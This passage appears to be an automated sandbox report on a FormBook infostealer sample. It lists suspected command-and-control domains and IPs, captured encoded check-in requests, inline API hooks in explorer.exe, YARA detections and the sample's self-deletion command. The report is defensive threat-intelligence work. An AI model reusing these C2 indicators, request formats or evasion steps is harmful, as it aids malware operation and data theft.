                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xc0ea8 | 0xc1000 | False | 0.8929652080634715 | data | 7.810545429614008 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xc4000 | 0x610 | 0x800 | False | 0.33203125 | data | 3.4238156775430793 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xc6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_VERSION | 0xc4090 | 0x380 | data | | | 0.421875
                                        RT_MANIFEST | 0xc4420 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                        DLL | Import
                                        mscoree.dll | _CorExeMain
                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        11/27/23-12:12:31.959094 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.5 | 195.35.38.7
                                        11/27/23-12:12:53.755681 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 172.67.198.102
                                        11/27/23-12:11:51.038850 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49722 | 80 | 192.168.2.5 | 103.224.212.216
                                        11/27/23-12:12:11.298434 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49723 | 80 | 192.168.2.5 | 3.33.130.190
                                        11/27/23-12:10:28.412473 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49721 | 80 | 192.168.2.5 | 3.33.130.190
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Nov 27, 2023 12:09:48.609153032 CET | 192.168.2.5 | 1.1.1.1 | 0x80e7 | Standard query (0) | www.fnb.gay | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:09:52.570972919 CET | 192.168.2.5 | 1.1.1.1 | 0xe2ea | Standard query (0) | www.fnb.gay | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:08.030184984 CET | 192.168.2.5 | 1.1.1.1 | 0xaa3 | Standard query (0) | www.fixerradvisory.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:28.186384916 CET | 192.168.2.5 | 1.1.1.1 | 0x812 | Standard query (0) | www.millerstoehr.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:48.956370115 CET | 192.168.2.5 | 1.1.1.1 | 0x9e6e | Standard query (0) | www.bolfm.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:11:09.375736952 CET | 192.168.2.5 | 1.1.1.1 | 0x6ac3 | Standard query (0) | www.videopromarket.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:11:50.612092018 CET | 192.168.2.5 | 1.1.1.1 | 0x194b | Standard query (0) | www.biddrivego.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:11.014244080 CET | 192.168.2.5 | 1.1.1.1 | 0x112f | Standard query (0) | www.cascadefinnish.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:31.427356958 CET | 192.168.2.5 | 1.1.1.1 | 0xe63d | Standard query (0) | www.alnawrasalrahhal.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:52.086749077 CET | 192.168.2.5 | 1.1.1.1 | 0xe267 | Standard query (0) | www.tqmsn.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:13:12.450062037 CET | 192.168.2.5 | 1.1.1.1 | 0x1d6d | Standard query (0) | www.odisexport.com | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:13:13.435719013 CET | 192.168.2.5 | 1.1.1.1 | 0x1d6d | Standard query (0) | www.odisexport.com | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Nov 27, 2023 12:09:48.750152111 CET | 1.1.1.1 | 192.168.2.5 | 0x80e7 | No error (0) | www.fnb.gay | | 130.61.77.41 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:09:52.696459055 CET | 1.1.1.1 | 192.168.2.5 | 0xe2ea | No error (0) | www.fnb.gay | | 130.61.77.41 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:08.156218052 CET | 1.1.1.1 | 192.168.2.5 | 0xaa3 | Name error (3) | www.fixerradvisory.com | none | none | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:28.317140102 CET | 1.1.1.1 | 192.168.2.5 | 0x812 | No error (0) | www.millerstoehr.com | millerstoehr.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:28.317140102 CET | 1.1.1.1 | 192.168.2.5 | 0x812 | No error (0) | millerstoehr.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:28.317140102 CET | 1.1.1.1 | 192.168.2.5 | 0x812 | No error (0) | millerstoehr.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:10:49.082743883 CET | 1.1.1.1 | 192.168.2.5 | 0x9e6e | Name error (3) | www.bolfm.com | none | none | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:11:09.501643896 CET | 1.1.1.1 | 192.168.2.5 | 0x6ac3 | Name error (3) | www.videopromarket.com | none | none | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:11:50.878679037 CET | 1.1.1.1 | 192.168.2.5 | 0x194b | No error (0) | www.biddrivego.com | | 103.224.212.216 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:11.203111887 CET | 1.1.1.1 | 192.168.2.5 | 0x112f | No error (0) | www.cascadefinnish.com | cascadefinnish.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:11.203111887 CET | 1.1.1.1 | 192.168.2.5 | 0x112f | No error (0) | cascadefinnish.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:11.203111887 CET | 1.1.1.1 | 192.168.2.5 | 0x112f | No error (0) | cascadefinnish.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:31.806691885 CET | 1.1.1.1 | 192.168.2.5 | 0xe63d | No error (0) | www.alnawrasalrahhal.com | alnawrasalrahhal.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:31.806691885 CET | 1.1.1.1 | 192.168.2.5 | 0xe63d | No error (0) | alnawrasalrahhal.com | | 195.35.38.7 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:52.420578003 CET | 1.1.1.1 | 192.168.2.5 | 0xe267 | No error (0) | www.tqmsn.com | | 172.67.198.102 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:12:52.420578003 CET | 1.1.1.1 | 192.168.2.5 | 0xe267 | No error (0) | www.tqmsn.com | | 104.21.74.46 | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:13:13.725692034 CET | 1.1.1.1 | 192.168.2.5 | 0x1d6d | Server failure (2) | www.odisexport.com | none | none | A (IP address) | IN (0x0001) | false
                                        Nov 27, 2023 12:13:13.725713015 CET | 1.1.1.1 | 192.168.2.5 | 0x1d6d | Server failure (2) | www.odisexport.com | none | none | A (IP address) | IN (0x0001) | false
                                        • www.millerstoehr.com
                                        • www.biddrivego.com
                                        • www.cascadefinnish.com
                                        • www.alnawrasalrahhal.com
                                        • www.tqmsn.com
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.5 | 49721 | 3.33.130.190 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 27, 2023 12:10:28.412472963 CET | 229 | OUT | GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv HTTP/1.1
                                        Host: www.millerstoehr.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:10:28.797043085 CET | 514 | IN | HTTP/1.1 403 Forbidden
                                        Server: openresty
                                        Date: Mon, 27 Nov 2023 11:10:28 GMT
                                        Content-Type: text/html
                                        Content-Length: 291
                                        Connection: close
                                        ETag: "6552b2f2-123"
                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.5 | 49722 | 103.224.212.216 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 27, 2023 12:11:51.038850069 CET | 227 | OUT | GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk HTTP/1.1
                                        Host: www.biddrivego.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:11:51.240446091 CET | 491 | IN | HTTP/1.1 302 Found
                                        date: Mon, 27 Nov 2023 11:11:51 GMT
                                        server: Apache
                                        set-cookie: __tad=1701083511.8561309; expires=Thu, 24-Nov-2033 11:11:51 GMT; Max-Age=315360000
                                        location: http://ww25.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk&subid1=20231127-2211-5178-8a11-d53c1cde7dc9
                                        content-length: 2
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 0a 0a
                                        Data Ascii:


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        2           192.168.2.5  49723        3.33.130.190     80                1028  C:\Windows\explorer.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 27, 2023 12:12:11.298434019 CET  231                OUT        GET /bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp HTTP/1.1
                                        Host: www.cascadefinnish.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:12:11.397602081 CET  514                IN         HTTP/1.1 403 Forbidden
                                        Server: openresty
                                        Date: Mon, 27 Nov 2023 11:12:11 GMT
                                        Content-Type: text/html
                                        Content-Length: 291
                                        Connection: close
                                        ETag: "6552b2aa-123"
                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        3           192.168.2.5  49724        195.35.38.7      80                1028  C:\Windows\explorer.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 27, 2023 12:12:31.959094048 CET  233                OUT        GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4 HTTP/1.1
                                        Host: www.alnawrasalrahhal.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:12:32.107918978 CET  1137               IN         HTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 707
                                        date: Mon, 27 Nov 2023 11:12:32 GMT
                                        server: LiteSpeed
                                        location: https://www.alnawrasalrahhal.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4
                                        platform: hostinger
                                        content-security-policy: upgrade-insecure-requests
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        4           192.168.2.5  49725        172.67.198.102   80                1028  C:\Windows\explorer.exe
                                        Timestamp                            Bytes transferred  Direction  Data
                                        Nov 27, 2023 12:12:53.755681038 CET  222                OUT        GET /bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp HTTP/1.1
                                        Host: www.tqmsn.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:12:54.095381021 CET  810                IN         HTTP/1.1 520
                                        Date: Mon, 27 Nov 2023 11:12:54 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p3eOxYbU%2FTkzn4UkeiMyywkR%2Br6Z07wNH1NKRVEC%2Fe4m%2F8dEdnrVym2%2F%2BAoXDYF%2Fq6iSNbgpCuHtQwSZ4WoivEixO7t1zPXnBG%2FWLA8jbvumcwHplH3quiozPZtETW2b"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 82c9f0503c7839b5-IAD
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                        Data Ascii: error code: 520


                                        Code Manipulations

                                        Function Name  Hook Type  Active in Processes
                                        PeekMessageA   INLINE     explorer.exe
                                        PeekMessageW   INLINE     explorer.exe
                                        GetMessageW    INLINE     explorer.exe
                                        GetMessageA    INLINE     explorer.exe
                                        Function Name  Hook Type  New Data
                                        PeekMessageA   INLINE     0x48 0x8B 0xB8 0x86 0x6E 0xE6
                                        PeekMessageW   INLINE     0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                                        GetMessageW    INLINE     0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                                        GetMessageA    INLINE     0x48 0x8B 0xB8 0x86 0x6E 0xE6


                                        Target ID:0
                                        Start time:12:09:05
                                        Start date:27/11/2023
                                        Path:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Imagebase:0x600000
                                        File size:793'600 bytes
                                        MD5 hash:E8FC0040E6882E0B9EA0E830B6D74D65
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:12:09:07
                                        Start date:27/11/2023
                                        Path:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Imagebase:0x470000
                                        File size:793'600 bytes
                                        MD5 hash:E8FC0040E6882E0B9EA0E830B6D74D65
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:12:09:07
                                        Start date:27/11/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff674740000
                                        File size:5'141'208 bytes
                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:12:09:09
                                        Start date:27/11/2023
                                        Path:C:\Windows\SysWOW64\control.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\control.exe
                                        Imagebase:0x9e0000
                                        File size:149'504 bytes
                                        MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:6
                                        Start time:12:09:12
                                        Start date:27/11/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:12:09:12
                                        Start date:27/11/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:11.3%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:161
                                          Total number of Limit Nodes:19

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "Q/$"Q/$"Q/$'eF9$'eF9$+U$+U
                                          • API String ID: 0-951757884
                                          • Opcode ID: 87b8014cd52102bc9de1d237f92ae8ffcf133b12f17bb26483c24fb2108feab3
                                          • Instruction ID: 3ae55fa274becd95c23be25cfb8b666455204216b2cf85ae9c58ae090b7df982
                                          • Opcode Fuzzy Hash: 87b8014cd52102bc9de1d237f92ae8ffcf133b12f17bb26483c24fb2108feab3
                                          • Instruction Fuzzy Hash: D0C12CB0D15219DFCB04CF95C4868AEFBB2FF88300B14E569E556AB354D734A982CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l$$cq$$cq$$cq$$cq
                                          • API String ID: 0-3438777806
                                          • Opcode ID: 4d363ee842b31ccb2c5fc35bec68befd821a13a5890f33304a074c27fe6c258d
                                          • Instruction ID: b4bb0ddd522a365e859bca24138c41947cb866ddec2c037f1cf0dd3b9e3b7140
                                          • Opcode Fuzzy Hash: 4d363ee842b31ccb2c5fc35bec68befd821a13a5890f33304a074c27fe6c258d
                                          • Instruction Fuzzy Hash: E991A074E11218CFEB64CFA4D995B9DBBB2FB89300F1094AAE44AA7354DB305E85CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "Q/$"Q/$"Q/$'eF9
                                          • API String ID: 0-3836312280
                                          • Opcode ID: 47c5dfc6d0e54b673082e1e9ff14ac1eccb4dcd9a12a1e08c79182ddca38eb6f
                                          • Instruction ID: 1a4910fbf1bc71c8b22a44eaa9b2cf1c8186993eb57b3875caf4a6303e43079c
                                          • Opcode Fuzzy Hash: 47c5dfc6d0e54b673082e1e9ff14ac1eccb4dcd9a12a1e08c79182ddca38eb6f
                                          • Instruction Fuzzy Hash: 57F1B2B4D04219DFCB04CF95C48A8AEFFB2FF45300B14A1A9E592AB355D734A982CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "Q/$"Q/$"Q/$'eF9
                                          • API String ID: 0-3836312280
                                          • Opcode ID: b530ae894292035f45f790c372ef042aa481835a62249a74bd55fd48e7f1ff13
                                          • Instruction ID: 22220294c41f1c3ddc1f3b5974f4e037a7a585e526234441b8d34a4d080b4c47
                                          • Opcode Fuzzy Hash: b530ae894292035f45f790c372ef042aa481835a62249a74bd55fd48e7f1ff13
                                          • Instruction Fuzzy Hash: CFD18074D14219DFCB04CF95C48A8AEFBB2FF88300B14E169E592AB355D734A982CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tecq$Tecq
                                          • API String ID: 0-2088518435
                                          • Opcode ID: e4750c21600d39079929ca2494a0135fff35e027037bf47d1a0ccdcf89366656
                                          • Instruction ID: 9cf3b70914cd5dc60afc5b84fa7fc30b4d460f97b48017b756ace340dcd683c6
                                          • Opcode Fuzzy Hash: e4750c21600d39079929ca2494a0135fff35e027037bf47d1a0ccdcf89366656
                                          • Instruction Fuzzy Hash: 11B171B5E0A2098FCB04CFA5C88A6DEFBB2EF99300F54A069E455AB354E7349905CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
